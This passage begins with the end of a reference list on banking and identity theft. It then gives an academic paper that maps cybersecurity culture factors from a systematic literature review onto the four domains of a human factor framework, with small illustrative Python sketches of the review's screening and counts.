3. FDIC: Insured or not insured? (2020). https://www.fdic.gov/consumers/consumer/information/fdiciorn.html
4. FTC: Financial institutions and customer information: Complying with the safeguards rule, July 2020. https://www.ftc.gov/tips-advice/business-center/guidance/financial-institutions-customer-information-complying
5. Galloway, A.: Non-probability sampling. In: Kempf-Leonard, K. (ed.) Encyclopedia of Social Measurement, pp. 859–864. Elsevier, New York (2005)
6. Jibril, A.B., Kwarteng, M.A., Botchway, R.K., Bode, J., Chovancova, M.: The impact of online identity theft on customers’ willingness to engage in e-banking transaction in Ghana: a technology threat avoidance theory. Cogent Bus. Manag. 7(1), 1832825 (2020)
7. Kahn, C.M., Liñares-Zegarra, J.M.: Identity theft and consumer payment choice: does security really matter? J. Financ. Serv. Res. 50(1), 121–159 (2016)
8. McLaughlin, R., Currie, E.: Is your bank putting you at risk of identity theft? (2020). https://bc.ctvnews.ca/is-your-bank-putting-you-at-risk-of-identity-theft-1.5130626
9. Rohmeyer, P., Bayuk, J.L.: Financial Cybersecurity Risk Management: Leadership Perspectives and Guidance for Systems and Institutions. Apress (2018)
10. Strohm, M.: Digital banking survey: how Americans prefer to bank (2022). https://www.forbes.com/advisor/banking/digital-banking-survey-2022/
11. Salmon, F.: Someone can empty your bank account with the information on the front of every check you write (2016). https://splinternews.com/someone-can-empty-your-bank-account-with-the-informatio-1793857226
12. Schaprio, R.: Is mail theft surging in the U.S.? postal service inspectors don’t know (2020). https://www.nbcnews.com/news/us-news/mail-theft-surging-u-s-postal-service-inspectors-don-t-n1241179
13. Finextra: Nab sends customer account details to the wrong people (2007). https://www.finextra.com/news/fullstory.aspx?newsitemid=16564
Conceptual Mapping of the Cybersecurity Culture to Human Factor Domain Framework
Emilia N. Mwim1, Jabu Mtsweni2(B), and Bester Chimbo1(B)
1 Department of Information Systems, School of Computing, College of Science Engineering and Technology, Unisa, Florida, South Africa
{mwimen,chimbb}@unisa.ac.za
2 Head of Information and Cyber Security Centre, CSIR, Pretoria, South Africa
[email protected]
Abstract. Human-related vulnerabilities continue to increase as organisations intensify their use of interconnected technologies for operations, particularly since the emergence of the COVID-19 pandemic. Despite the human problem in cybersecurity, existing cybersecurity measures have predominantly focused on technological solutions, which on their own have proven insufficient. To ensure an all-inclusive cybersecurity solution, efforts are shifting to accommodate the human angle, which complements technological efforts towards eradicating cybersecurity challenges; hence the move to cybersecurity culture (CSC). The importance of the human-related factor for the security of information and IT systems has been emphasised by various studies, leading to the development of the Human Factor Diamond (HFD) framework. This paper maps, at the conceptual level, the articulated list of identified CSC factors to the HFD framework to determine which CSC factors are associated with the different domains of the human factor framework. The mapping shows that each domain of the human factor framework has CSC factors associated with it. Management emerged as the domain with the largest number of factors, followed by responsibility, environment and preparedness, in that order.
Keywords: Human factor · Cybersecurity culture · Human factor domain · Cybersecurity culture factors
1 Introduction
Cybersecurity is a global issue of concern among nations, industries and sectors [1, 2]. The term has been widely defined as an approach used to tackle cyber threats and risks [3, 4] in order to protect the Confidentiality, Integrity and Availability (CIA) of cyber assets [5]. Depending on the industry, cybersecurity is confronted with different challenges, ranging from lack of resources and outdated technology to lack of awareness, education and training [6–8]. However, human error has been emphasised as the major cause of cybersecurity incidents and challenges across sectors, with some sectors more affected than others [9–11].
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 729–742, 2023. https://doi.org/10.1007/978-3-031-28073-3_49
Although human error is considered one of the biggest contributors to cybersecurity threats and the major vulnerability of IT systems, the problem is still not receiving significant attention [12, 13]. Human-related measures that make people realise the significance of obeying rules and behaving in line with the organisation’s acceptable security behaviour still need attention [13]. Cybersecurity efforts focus predominantly on technological solutions such as firewalls, anti-virus, endpoint security and intrusion detection systems to protect organisations from cyber threats [14–16]. Nonetheless, the continuous increase in global cybersecurity incidents and the changing landscape of cyber threats, particularly in the healthcare and financial sectors, are evidence that technological solutions alone are insufficient to address the problem of cyber threats in today’s organisations. More recent research holds the same view: the existing perspective on cybersecurity is narrow because it overlooks human elements and focuses attention on technological solutions [17]. Security measures therefore require some element of human participation, as it is impossible for organisations to protect the CIA of their information and cyber resources without the human factor. The inadequacy of current solutions, owing to the lack of an inclusive cybersecurity solution, positions CSC as a critical research area. For this reason, the importance of CSC as a fundamental consideration in eradicating the human problem in cybersecurity is beginning to gain attention [18–22]. CSC is an evolving research area with a growing need for research, which has led to the development of an articulated list of CSC factors [23]. In this paper, the identified CSC factors are conceptually mapped to the Alhogail et al. HFD framework to determine the CSC factors that can be attributed to the different domains of the human factor.
Through this mapping, the domains of the human factor framework can be recommended as possible dimensions to be considered in future CSC research. The major advantage of the conceptual model developed in this paper is that it accommodates a broader list of CSC factors. The paper first presents the Preferred Reporting Items for Systematic Reviews and Meta-Analyses (PRISMA) method followed in identifying the consolidated CSC factors. The factors identified are highlighted in Sect. 3, followed by a presentation of the human factor framework in Sect. 4. Building on the studies on CSC frameworks and the human factor domains, a conceptual mapping of the CSC factors to the Alhogail et al. HFD framework is presented in Sect. 5. Finally, the limitations of the paper are outlined in Sect. 6, and the conclusion and future work are presented in Sect. 7.
2 Research Method
The systematic literature review used to develop the articulated list of CSC factors followed the PRISMA technique [24]. The PRISMA approach to systematic review uses a carefully designed method to identify and review related literature and to analyse the findings from that literature. The review followed a four-phase approach, summarised in the PRISMA diagram depicted in Fig. 1.
• Publications in academic and non-academic databases, both computing and non-computing, were searched and retrieved.
• Titles and abstracts were reviewed, and duplicate articles were removed.
• After the removal of duplicate articles, the remaining records were saved and imported into ATLAS.ti for final review.
• In the final review, further articles were removed because they did not meet the inclusion criteria. A few more articles were added from the references of the reviewed articles.
The literature search took place between December 2020 and March 2021, using the keywords below to search for peer-reviewed academic publications and a few other non-academic publications.
“cybersecurity culture” OR “cyber security culture”
“cybersecurity culture*” OR “cyber security culture*”
Included in the review are: 1) articles published between 2010 and 2021; 2) publications in English only; 3) articles published in journals, conference proceedings, theses, book chapters, policy documents and reports; and 4) work on cybersecurity culture conducted at all levels (individual, organisational, national, and international). Excluded from the review are articles that fall outside the specified year range, are not published in English, or whose content is not largely focused on cybersecurity culture. Table 1 provides a summary of the searched databases with the number of retrieved records.
Table 1. Database search
Literature search    Numbers
IEEE                 94
ACM                  7
Web of Science       40
ProQuest             87
PubMed               120
Sabinet              6
Scopus               165
Others               17
Alert                3
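The inclusion and exclusion criteria listed above can be expressed as a simple screening predicate. The following is a minimal sketch, not the authors’ tooling (the review itself was carried out in ATLAS.ti): the `Record` type, its field names and the `focuses_on_csc` flag (standing in for the reviewer’s judgement about an article’s focus) are assumptions made for illustration.

```python
from dataclasses import dataclass

# Publication types named in inclusion criterion 3 (labels are illustrative).
ALLOWED_TYPES = {
    "journal",
    "conference proceedings",
    "thesis",
    "book chapter",
    "policy document",
    "report",
}


@dataclass
class Record:
    title: str
    year: int
    language: str
    pub_type: str
    focuses_on_csc: bool  # hypothetical flag set by a human reviewer


def meets_inclusion_criteria(record: Record) -> bool:
    """Apply the year range, language, publication type and focus criteria."""
    return (
        2010 <= record.year <= 2021
        and record.language == "English"
        and record.pub_type in ALLOWED_TYPES
        and record.focuses_on_csc
    )


# Made-up records, used only to exercise the predicate.
candidates = [
    Record("Example A", 2019, "English", "journal", True),
    Record("Example B", 2008, "English", "journal", True),
    Record("Example C", 2020, "English", "report", False),
]
included = [r.title for r in candidates if meets_inclusion_criteria(r)]
print(included)  # ['Example A']
```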
Using the search keywords, a total of 539 articles were retrieved. Of these, 39 were identified as duplicates and removed. After reviewing the titles and abstracts of the remaining articles, an additional 423 records were removed as irrelevant. A total of 77 articles were retained for full-text review. After applying the inclusion and exclusion criteria, a further 19 articles were removed because their focus was not predominantly on CSC and its factors. Figure 1 depicts the PRISMA process.
Fig. 1. PRISMA process
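The record counts reported for the PRISMA process can be checked with a few lines of arithmetic. The sketch below uses only the figures given in Table 1 and in the text; the variable names are illustrative. The number of articles later added from reference lists is not stated, so the final number of included studies is deliberately not computed.

```python
# Records retrieved per source, as listed in Table 1.
retrieved_per_source = {
    "IEEE": 94,
    "ACM": 7,
    "Web of Science": 40,
    "ProQuest": 87,
    "PubMed": 120,
    "Sabinet": 6,
    "Scopus": 165,
    "Others": 17,
    "Alert": 3,
}

total_retrieved = sum(retrieved_per_source.values())
after_duplicates = total_retrieved - 39    # duplicates removed
after_screening = after_duplicates - 423   # removed on title/abstract review
after_full_text = after_screening - 19     # removed at full-text review

print(total_retrieved)   # 539
print(after_duplicates)  # 500
print(after_screening)   # 77
print(after_full_text)   # 58, before articles added from reference lists
```

The per-database counts sum to the reported total of 539, and removing the 39 duplicates and 423 irrelevant records leaves the 77 articles reported for full-text review.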
3 Identified Cybersecurity Culture Factors
The effort to develop the articulated list of CSC factors was motivated by the growing need for research on CSC as an emerging area. Work on CSC is still in its infancy but is beginning to gain momentum, as CSC is emerging as a measure that can help eradicate human-related problems in cybersecurity. Over time, the concept of cybersecurity has predominantly been used interchangeably with information security, and the same applies to the corresponding concepts of CSC and information security culture [25, 26]. On this view, cybersecurity is defined directly as information security [27]. However, it has emerged that a critical difference exists between the two concepts [18, 28–30]. A major difference is visible in the National Institute of Standards and Technology (NIST) definitions of the terms. The focus of information security is on the protection of information assets irrespective of their format, while cybersecurity focuses on the protection of digital assets. Another critical distinction is that information security focuses on the protection of information within the organisational context, while cybersecurity extends beyond the borders of the organisation, since cyberspace allows the sharing of information outside those borders [28, 30]. Taking this into consideration, it became essential to identify and understand the factors that are attributed to CSC, since information security culture has already been researched extensively. Based on the identified factors, the top factors that are highly significant in the cultivation, implementation and maintenance of CSC are: training and education; awareness; top management or leadership support; human behaviour; organisational culture; cybersecurity policy and procedures; cybersecurity strategy; budget and resources; knowledge; role and responsibility; cybersecurity champion or team; engagement, encouragement, cooperation; commitment; and collaboration. The complete list of identified factors is contained in Table 2 below, which depicts the 29 CSC factors identified in the first leg of the CSC series of publications. For detailed explanations of these factors, see [23].
Table 2. Cybersecurity culture factors
Cybersecurity culture factors
Training and education
Awareness
Top management
Cybersecurity policy and procedures
Role and responsibility
Engagement, encouragement, cooperation
Human behaviour
Budget and resources
Cybersecurity strategy
Knowledge and understanding
Collaboration
Information sharing
Commitment
Organisational culture
Cybersecurity champion or team
Change management
Cybersecurity hub
Accountability
Collectivism
Trust
Compliance
Security audit
Rewards and sanctions
Measure of effectiveness
Ethical conduct
National culture
Governance and control (legal and regulatory)
Having highlighted the CSC factors identified in research, the next section provides background on the human factor, which is considered the greatest threat to cybersecurity.
4 Human Factor
Humans are the insiders, employees or individuals who access and use the ICT resources of an organisation to achieve a specific purpose [11, 31, 32]. Technological innovation and the opportunities created by the emergence of 4IR have diversified organisations’ users and employees to include both those physically located in the organisation and those located virtually, which in turn has diversified the nature of the threats that the behaviour of these users can pose. A threat posed by users or employees is referred to as an insider threat, and years of research have revealed human-related factors to be the greatest cause of the security threats and incidents that confront organisations [9–11, 31, 33–35]. This is attributed to the fact that this group consists of trusted members of the organisation with valid access to systems and endpoint security [16, 35]. Threats based on human behaviour can result from both malicious and non-malicious actions of employees. Malicious actions include unethical and illegal behaviours such as data destruction, persistent attacks and identity theft [16, 36], while non-malicious behaviours include not turning off a workstation when it is not in use, not following password procedures and general carelessness [16]. Although human-related problems contribute to the greatest cybersecurity threats and challenges, research that places humans at the centre of the cybersecurity solution (commonly known as cybersecurity culture) has not yet received significant attention [12, 13] compared with information security; hence the move to CSC. Past efforts to address the cybersecurity problem focused predominantly on technological solutions [14–16]. However, global cybersecurity incidents and the changing landscape of cyber threats are evidence that technological solutions on their own cannot sufficiently address cybersecurity threats and challenges in today’s organisations, because of human-related factors. Human behaviour is likely to expose organisations to cybersecurity threats regardless of the available technical solutions and their effectiveness. Therefore, efforts towards human-related measures need urgent attention [13].
4.1 Factors of Human Problem
Various factors contribute to the human-related problem across the levels of cybersecurity, whether individual, organisational, national or international. For example, humans can easily be persuaded, deceived or hoaxed into compromising access to critical organisational information or into clicking on malicious links that could have a devastating effect. Lack of user participation, avoidance of important security activities, the view that security measures are hindrances and a waste of time, difficulty in accepting changes introduced in the organisation, absence of motivation, lack of awareness and poor use of technology are also identified as factors that contribute to the human-related problem. Additional human-related factors that positively or negatively influence employees’ behaviour towards cybersecurity include their perceptions, norms, attitudes, values, beliefs and other characteristics unique to them [37–39]. Linked to the human factors are employees’ knowledge, skills, commitment, training and awareness regarding security-related issues [40]. These factors complement each other and together determine the level of an employee’s preparedness to meet the organisation’s security requirements [41]. Absence of these factors could influence employees’ behaviour negatively and hinder them from securing the CIA of the organisation’s sensitive information and other vital information within and outside the organisation. It is argued that security education and awareness, monitoring of security behaviour and compliance measures may still not guarantee secure behaviour [42], especially where users have developed a negative attitude and perception towards security [39, 43]. Even without security education and awareness, such users may still likely display behaviours that are not unique to them [42]. Emerging strongly from the factors that contribute to the human-related problem are human characteristics and behaviours that reflect qualities of culture, which Schein described as an abstraction that becomes tangible in the behaviours and attitudes of people. The problems observed in relation to the human factor call for research on the human approach and CSC [14]. Research has shown that cultivating a security culture among users remains the most appropriate approach to addressing the human-related problem [44, 45]. Since the discovery of culture as a measure for eliminating human vulnerabilities, past research has focused extensively on information security culture [1, 12, 31, 33, 37, 46]. However, given the advent of interconnected technologies and the impact of 4IR in broadening the connectivity of employees and users, which exposes them to more security threats, an information security culture that focuses on the organisational context will fall short in addressing cybersecurity threats and challenges. This calls for cultivating CSC as a form of security culture that extends beyond the organisational context. The need to develop and preserve an appropriate, workable and easy-to-follow cybersecurity culture in an organisation is welcomed as a means to protect employees from unintentional harm and attacks [47]. CSC is considered a human-centred approach to the security of information as well as other assets in cyberspace [48]. Research efforts in the area of the human factor mostly focus on information security and information security culture. In contrast, CSC has not received the necessary attention; hence the concept and its delineating elements are still ill defined [18, 48].
Consistent with other emerging research building the domain of CSC, this paper maps the list of CSC factors presented in Sect. 3 to the domains of the Alhogail et al. human factor framework.
4.2 Human Factor Framework
The importance of the human factor in ensuring the security of an organisation and its critical assets has been dealt with extensively in information security [36, 37, 39, 43, 49–52]. Research in this area has investigated, for example, the impact of personality traits [15, 34, 47, 53, 54] and the effect of cultural setting [55, 56]. This body of research led to the development of a framework that provides a detailed view of the human factor problems that influence human behaviour towards security [11]. Figure 2 depicts the human factor framework. The framework aims to make human factors easier to understand by evaluating them from four domain angles [11]. According to the framework, human factors are categorised into two dimensions, namely organisation and employee. The organisation dimension consists of the environment domain, which relates to issues of culture, social norms, standards and regulations, and the management domain, which deals with security policy, practices, management commitment and direction. The employee dimension consists of the preparedness domain, which focuses on issues such as training, awareness and knowledge acquisition, and the responsibility domain, which deals with employee commitment, skills, practices and performance, such as employee acceptance of responsibility, monitoring, control, rewards and deterrence [11, 31]. The responsibility domain relates to employee attitudes.
Fig. 2. Human factor diamond framework [11]
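The structure of the framework described above (two dimensions, each with two domains) can be written down as a small nested mapping. This is a minimal sketch for illustration only: the issue labels paraphrase the prose of this section, and the names `HFD_FRAMEWORK`, `dimension_of` and `all_domains` are hypothetical, not taken from [11].

```python
# Dimensions -> domains -> example issues, paraphrased from the text.
HFD_FRAMEWORK = {
    "organisation": {
        "environment": ["culture", "social norms", "standards", "regulations"],
        "management": [
            "security policy",
            "practices",
            "management commitment",
            "direction",
        ],
    },
    "employee": {
        "preparedness": ["training", "awareness", "knowledge acquisition"],
        "responsibility": ["commitment", "skills", "practices", "performance"],
    },
}


def dimension_of(domain: str) -> str:
    """Return the dimension (organisation or employee) a domain belongs to."""
    for dimension, domains in HFD_FRAMEWORK.items():
        if domain in domains:
            return dimension
    raise KeyError(f"unknown domain: {domain}")


def all_domains() -> list[str]:
    """List the four domains in the order they are introduced in the text."""
    return [d for domains in HFD_FRAMEWORK.values() for d in domains]


print(all_domains())
# ['environment', 'management', 'preparedness', 'responsibility']
print(dimension_of("preparedness"))  # employee
```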
5 Mapping of Cybersecurity Culture Factors and Human Factor Domain
A comprehensive list of CSC factors identified during the systematic literature review was highlighted in Sect. 3, and the Alhogail et al. human factor framework was presented in Sect. 4. Since CSC revolves around humans and the HFD framework enhances the understanding of the human factor, it is deemed critical to plot the CSC factors against the HFD framework. This contributes to research by combining the various CSC factors consolidated in [23] to provide a detailed picture of CSC that covers human factor issues. Additionally, the mapping provides knowledge of how the underlying CSC factors are categorised under the elements and associated issues of the HFD framework. To map the CSC factors, the researchers examined the internal and external factors that influence security culture, the organisational and individual factors according to existing CSC frameworks and models, and the explanations of the human factor domains depicted in Fig. 2. Internal factors are factors inside the organisation that can be seen at the organisational and individual levels; for example, the provision of cybersecurity resources is an organisational-level factor and human characteristics are an individual-level factor [29, 57]. External factors are factors outside the organisation that influence its security culture, for example national culture, standards and legal requirements [29, 57]. Based on the explanations of the human factor domains provided by Alhogail et al. and the different groups of factors highlighted in this section, the paper maps the CSC factors against the four domains as depicted in Fig. 3.
Conceptual Mapping of the Cybersecurity Culture
Fig. 3. Mapping of CSC factor to HFD framework
According to Fig. 3, the CSC factors are grouped into two dimensions, the organisational and individual levels, using the four human factor domains of [11]: environment, management, preparedness and responsibility.
5.1 Organisational and Individual Level Factors
Organisational level factors include factors linked to the technological infrastructure, operation, policy, and procedure of organisation security [58]. Organisational factors are management actions that are used to influence and shape CSC [20, 29]. According to [29], organisational factors, referred to as organisation mechanisms, are spoken rules of the organisation that are shaped by leadership actions. The organisation mechanisms include factors like rewards and punishments, CSC leadership, and communication. These factors are examples of internal organisation factors and they are depicted in the management domain of the conceptual model in Fig. 3. As shown in Fig. 3, it is therefore evident that the organisational level includes factors that are internal to the organisation (management related factors) and is also influenced by external factors (environment related factors). An example of an external factor is a government rule on cybersecurity that influences the development of organisation policy and procedures on cybersecurity.
Individual level factors are factors that focus on employees’ traits and characteristics and have an immediate influence on their security behaviours [58]. According to the human factor framework by Alhogail et al., individual factors, which are also referred to as employee factors [11], are categorised into preparedness and responsibility. Preparedness covers actions that prepare employees for cybersecurity, for example training and awareness, which they take the initiative to acquire. Responsibility relates to employees’ behaviour, which demonstrates their roles and duties in the organisation. Examples of responsibility include employee commitment and attitude towards cybersecurity.
5.2 Discussions
In addition to the Alhogail et al. explanation of the human factor framework, another important work that contributed significantly to the mapping of the factors to the framework is the CSC model of [58]. Although there are already theoretical perspectives that deal with human aspects, such as those of [29, 58], these frameworks have a few drawbacks: a lack of consistency in the way the authors’ frameworks categorised and consolidated the various human aspects; and the fact that the frameworks were not based on an all-inclusive set of CSC factors. To address these challenges, the conceptual model developed in this paper (Fig. 3) uses the HFD framework to bring consistency across the existing CSC frameworks that focus on human factor aspects. The model is based on the consolidated CSC factors recently developed from a systematic literature review study [23]. Based on the mapping of the factors depicted in Fig. 3, it is evident that the achievement of CSC requires favourable human behavioural actions at both the organisational and individual levels. Hence, there are factors associated with the domains that represent each level.
Management, from the organisational level, is an important domain that contains the greatest number of CSC factors, 19 in total. It is followed by the responsibility domain from the individual level, which has the second highest number with a total of seven CSC factors. Finally, environment from the organisational level and preparedness from the individual level are the domains with the fewest factors, totalling four and three factors respectively. It is also important to note that the two HFD domains with the highest number of factors, management and responsibility, also share a few CSC factors that apply to both, namely commitment and compliance. These factors apply to the two domains because actions are required at both the organisational and individual levels to achieve them. Based on the explanation of the organisational factor and the grouping of its factors [11, 20, 58], the organisational culture factor is considered to be a factor in both the management and environment domains. Compliance and commitment are considered as factors in both the organisation and individual level dimensions, under the domains of management and responsibility. On the one hand, organisations encourage compliance and are committed to ensuring adherence to security policy and procedure among employees in the organisation. On the other hand, employees need to ensure compliance with security policy and standards as well as being committed to security issues.
This conceptual assignment of the CSC factors to the HFD framework appears consistent with the original findings of Alhogail et al. The findings in the authors’ original work revealed that management is the domain with the highest score, followed by preparedness. Just as in the Alhogail et al. findings, in this paper the environment and preparedness domains contain almost the same number of factors, with a difference of one factor between them. The actual impact of these factors on each of the domains will be ascertained with empirical findings, which is the next stage of the research.
6 Limitation
The major limitation of this paper is the fact that the CSC factors have not been evaluated and validated with empirical data against the domains of the HFD.
7 Conclusion and Future Work
With the emergence and increasing use of interconnected technology, the goal of every organisation is to protect its crucial assets from cyber-attack incidents. As a result, organisations are implementing technological security measures to eradicate cyber-attacks. However, the ever-increasing number of cybersecurity incidents across organisations is evidence that advanced technological measures on their own cannot provide full protection to an organisation if its human factor elements are not considered. The study developed a conceptual understanding of the CSC factors that are associated with each domain of the HFD framework of Alhogail et al. To do this, the researchers mapped the CSC factors identified in their previous study to the existing and well-established human factor framework. It is evident from the mapping that the four domains, namely environment, management, preparedness and responsibility, representing the organisational and individual levels, have factors associated with them. Management from the organisational level has the highest number of factors associated with it, followed by responsibility from the individual level. This paper recommends, at a conceptual level, that the human domain elements onto which the CSC factors are mapped could be considered as possible dimensions in future CSC discussions and research. As future work, the researchers are currently carrying out the evaluation and validation.
References
1. Hassan, N., Maarop, N., Ismail, Z., Abidin, W.: Information security culture in health informatics environment: a qualitative approach. In: 2017 International Conference on Research and Innovation in Information Systems (ICRIIS), pp. 1–6 (2017)
2. Kortjan, N., von Solms, R.: A conceptual framework for cyber-security awareness and education in SA. South African Comput. J. 52(52), 29–41 (2014)
3. Luiijf, E., Besseling, K.: Nineteen national cyber security strategies. Int. J. Crit. Infrastruct. 9(1–2), 3–31 (2013)
4. Schatz, D., Bashroush, R., Wall, J.: Towards a more representative definition cyber security. J. Dig. Foren. Secur. Law 12(2), 8 (2017)
5. Pfleeger, C., Pfleeger, L., Margulies, J.: Security in Computing, 5th edn. Pearson Education (2015)
6. Coventry, L., Branley, D.: Cybersecurity in healthcare: a narrative review of trends, threats and ways forward. Maturitas 113, 48–52 (2018)
7. Martin, G., Martin, P., Hankin, C., Darzi, A., Kinross, J.: Cybersecurity and healthcare: how safe are we? BMJ 358, 4–7 (2017)
8. Ghafur, S., Grass, E., Jennings, N., Darzi, A.: The challenges of cybersecurity in health care: the UK National Health Service as a case study. Lancet Dig. Health 1(1), 10–12 (2019)
9. Ponemon Institute: 2017 Cost of Data Breach Study: Global Overview (2018). https://www.ponemon.org/blog/2017-cost-of-data-breach-study-united-states, https://www.ibm.com/security/data-breach. Accessed 20 Jan 2020
10. Furnell, S., Alotaibi, F., Esmael, R.: Aligning security practice with policy: guiding and nudging towards better behavior. In: Proceedings of the 52nd Hawaii International Conference on System Sciences, pp. 5618–5627 (2019)
11. Alhogail, A., Mirza, A., Bakry, S.: A comprehensive human factor framework for information security in organizations. J. Theor. Appl. Inform. Technol. 78(2), 201–211 (2015)
12. Thomson, K., von Solms, R., Louw, L.: Cultivating an organizational information security culture. Comput. Fraud Secur. 10, 7–11 (2006)
13. Ciuperca, E., Vevera, V., Cirnu, C.: Social variables of cyber security educational programmes. In: The 15th International Scientific Conference eLearning and Software for Education Bucharest, pp. 190–194 (2019)
14. Gcaza, N., von Solms, R., Van Vuuren, J.: An ontology for a national cyber-security culture environment. In: Proceedings of the 9th International Symposium on Human Aspects of Information Security and Assurance, HAISA 2015, Haisa, pp. 1–10 (2015)
15. Jeong, J., Mihelcic, J., Oliver, G., Rudolph, C.: Towards an improved understanding of human factors in cybersecurity. In: Proceedings - 2019 IEEE 5th International Conference on Collaboration and Internet Computing, CIC 2019, pp. 338–345 (2019)
16. Warkentin, M., Willison, R.: Behavioral and policy issues in information systems security: the insider threat. Eur. J. Inform. Syst. 18(2), 101–105 (2009)
17. Branley-bell, D., Coventry, L., Sillence, E.: Promoting cybersecurity culture change in healthcare. In: The 14th Pervasive Technologies Related to Assistive Environments Conference, pp. 544–549 (2021)
18. Gcaza, N., von Solms, R.: Cybersecurity culture: an ill-defined problem. In: 10th IFIP World Conference on Information Security Education (WISE), pp. 98–109 (2017)
19. Corradini, I.: Building a cybersecurity culture. In: Building a Cybersecurity Culture in Organizations. SSDC, vol. 284, pp. 63–86. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-43999-6_4
20. European Union Agency for Network and Information Security, Cyber Security Culture in organisations (2017)
21. Gundu, T., Maronga, M., Boucher, D.: Industry 4.0 business perspective: fostering a cyber security culture in a culturally diverse workplace. In: Proceedings of 4th International Conference on the Internet, Cyber Security and Information Systems, pp. 85–94 (2019)
22. Gcaza, N.: A national Strategy towards Cultivating a Cybersecurity Culture in South Africa. Nelson Mandela Metropolitan University (2017)
23. Mwim, E.N., Mtsweni, J.: Systematic review of factors that influence the cybersecurity culture. In: Clarke, N., Furnell, S. (eds) Human Aspects of Information Security and Assurance. HAISA 2022. IFIP Advances in Information and Communication Technology, vol. 658, pp. 147–172. Springer, Cham (2022). https://doi.org/10.1007/978-3-031-12172-2_12
24. Moher, D., Liberati, A., Tetzlaff, J., Altman, D.G., Group, P.: Preferred reporting items for systematic reviews and meta-analyses: the PRISMA statement. Ann. Internal Med. 151(4), 264–270 (2009)
25. Astakhova, L.V.: The concept of the information-security culture. Sci. Tech. Inf. Process. 41(1), 22–28 (2014). https://doi.org/10.3103/S0147688214010067
26. Ghernaouti-Hélie, S.: An inclusive information society needs a global approach of information security. In: Proceedings of International Conference on Availability, Reliability Security, pp. 658–662 (2009)
27. ISO/IEC 27002: Information technology-Security techniques-Code of practice for information security management (2005). www.iso.org. Accessed 14 Aug 2020
28. Reid, R., Van Niekerk, J.: From information security to cyber security cultures. In: 2014 Information Security for South Africa - Proceedings of the ISSA 2014 Conference, pp. 1–7 (2014)
29. Huang, K., Pearlson, K.: For what technology can’t fix: building a model of organizational cybersecurity culture. In: Proceeding of the 52nd Hawaii International Conference on System Sciences, pp. 6398–6407 (2019)
30. von Solms, R., van Niekerk, J.: From information security to cyber security. Comput. Secur. 38, 97–102 (2013)
31. Alhogail, A., Mirza, A., Bakry, S.H.: A comprehensive human factor framework for information security in organizations. J. Theor. Appl. Inf. Technol. 78(2), 201–211 (2015)
32. Alshboul, Y., Streff, K.: Beyond cybersecurity awareness: antecedents and satisfaction. In: Proceeding of the 2017 International Conference Proceeding Software and e-Business, pp. 85–91 (2017)
33. Da Veiga, A., Martins, N.: Improving the information security culture through monitoring and implementation actions illustrated through a case study. Comput. Secur. 49, 162–176 (2015)
34. Evans, M., Maglaras, L., He, Y., Janicke, H.: Human behaviour as an aspect of cybersecurity assurance. Secur. Commun. Netw. 9(17), 4667–4679 (2016)
35. Holdsworth, J., Apeh, E.: An effective immersive cyber security awareness learning platform for businesses in the hospitality sector. In: Proceedings of 2017 IEEE 25th International Requirements Engineering Conference Workshops, REW 2017, pp. 111–117 (2017)
36. Stanton, J., Stam, K., Mastrangelo, P., Jolton, J.: Analysis of end user security behaviors. Comput. Secur. 24(2), 124–133 (2005)
37. Da Veiga, A., Eloff, J.: A framework and assessment instrument for information security culture. Comput. Secur. 29(2), 196–207 (2010)
38. Gcaza, N., Von Solms, R.: A strategy for a cybersecurity culture: a South African perspective. Electron. J. Inform. Syst. Develop. Countries 80(1), 1–17 (2017)
39. Leach, L.: Improving user security behaviour. Comput. Secur. 22(8), 685–692 (2003)
40. Pfleeger, S.L., Caputo, D.D.: Leveraging behavioral science to mitigate cyber security risk. Comput. Secur. 31(4), 597–611 (2012)
41. Goh, R.: Information Security: The Importance of the Human Element. Preston University (2003)
42. Al-Shehri, Y.: Information security awareness and culture. Br. J. Arts Soc. Sci. 6(1), 2046–9578 (2012). Accessed 22 Oct 2018
43. Van Niekerk, J.: Fostering Information Security Culture Through Integrating Theory and Technology, Nelson Mandela Metropolitan University (2010)
44. Furnell, S., Thomson, K.: From culture to disobedience: recognising the varying user acceptance of IT security. Comput. Fraud Secur. 2009(2), 5–10 (2009)
45. Reid, R., Van Niekerk, J.: Towards an education campaign for fostering a societal, cyber security culture. In: 8th International Symposium Human Aspect of Information Security Assurance (HAISA), pp. 174–184 (2014)
46. Schlienger, T., Teufel, S.: Information security culture. In: Ghonaimy, M.A., El-Hadidi, M.T., Aslan, H.K. (eds.) Security in the Information Society. IAICT, vol. 86, pp. 191–201. Springer, Boston, MA (2002). https://doi.org/10.1007/978-0-387-35586-3_15
47. Metalidou, E., Marinagi, C., Trivellas, P., Eberhagen, N., Skourlas, C., Giannakopoulos, G.: The human factor of information security: unintentional damage perspective. Procedia - Soc. Behav. Sci. 147, 424–428 (2014)
48. Gcaza, N., Von Solms, R., Grobler, M., Van Vuuren, J.: A general morphological analysis: delineating a cyber-security culture. Inform. Comput. Secur. 25(3), 259–278 (2017)
49. Alnatheer, M., Nelson, K.: Proposed framework for understanding information security culture and practices in the Saudi context. In: Proceedings of the 7th Australian Information Security Management Conference, pp. 6–17 (2009)
50. Colwill, C.: Human factors in information security: the insider threat–who can you trust these days? Inform. Secur. Technol. Report 14(4), 186–196 (2009)
51. Knapp, K., Marshall, T., Rainer, K., Ford, F.: Information security: management’s effect on culture and policy. Inform. Manage. Comput. Secur. 14(1), 24–36 (2006)
52. Oates, B., Capper, G.: Using systematic reviews and evidence-based software engineering with masters students. In: 13th International Conference on Evaluation and Assessment in Software Engineering, pp. 1–9 (2009)
53. Farooq, A., Isoaho, J., Virtanen, S., Isoaho, J.: Information security awareness in educational institution: an analysis of students’ individual factors. In: Proceedings - 14th IEEE International Conference on Trust, Security and Privacy in Computing and Communications, TrustCom 2015, pp. 352–359 (2005)
54. McCormac, A., Zwaans, T., Parsons, K., Calic, D., Butavicius, M., Pattinson, M.: Individual differences and Information Security Awareness. Comput. Hum. Behav. 69, 151–156 (2017)
55. Halevi, T., et al.: Cultural and psychological factors in cyber-security. In: Proceedings of the 18th International Conference on Information Integration and Web-based Applications and Services, pp. 318–324 (2016)
56. Sun, J., Ahluwalia, P., Koong, K.: The more secure the better? A study of information security readiness. Indust. Manage. Data Syst. 111(4), 570–588 (2011)
57. Da Veiga, D.: Achieving a Security Culture, in Chapter 5 In Cybersecurity Education for Awareness and Compliance (2018)
58. Georgiadou, A., Mouzakitis, S., Bounas, K., Askounis, D.: A cyber-security culture framework for assessing organization readiness. J. Comput. Inform. Syst. 1–11 (2020)
